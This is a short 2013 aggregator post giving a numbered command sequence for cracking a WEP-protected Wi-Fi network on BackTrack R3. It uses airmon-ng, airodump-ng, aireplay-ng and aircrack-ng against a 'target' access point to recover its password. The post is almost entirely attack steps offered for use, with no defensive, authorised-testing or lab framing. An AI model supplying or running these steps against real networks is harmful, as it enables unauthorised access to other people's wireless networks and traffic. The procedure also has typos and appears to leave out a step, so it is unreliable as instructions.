Wi-fi Cracking (WEP) For this we are going to use BackTrack R3 1) - TopicsExpress



          

Wi-fi Cracking (WEP) For this we are going to use BackTrack R3 1) Open Terminal and type command #airmon-ng start wlan0 (To start monitor mode of wifi NIC) 2) #airodump-ng mon0 3) #airodump-ng -c (give the channel id of target) -w filename --bssid (MAC address of target aaccess point) mon0 4) #aireplay-ng -1 5 -a (MAC address of target aaccess point) mon0 5) #aircrack-ng file (Drop-Down the file from / Home folder which have ext .cap) press enter 6) you got the Key (Wi-fi Access Point password)
Posted on: Mon, 29 Jul 2013 19:14:37 +0000

Trending Topics



Recently Viewed Topics




© 2015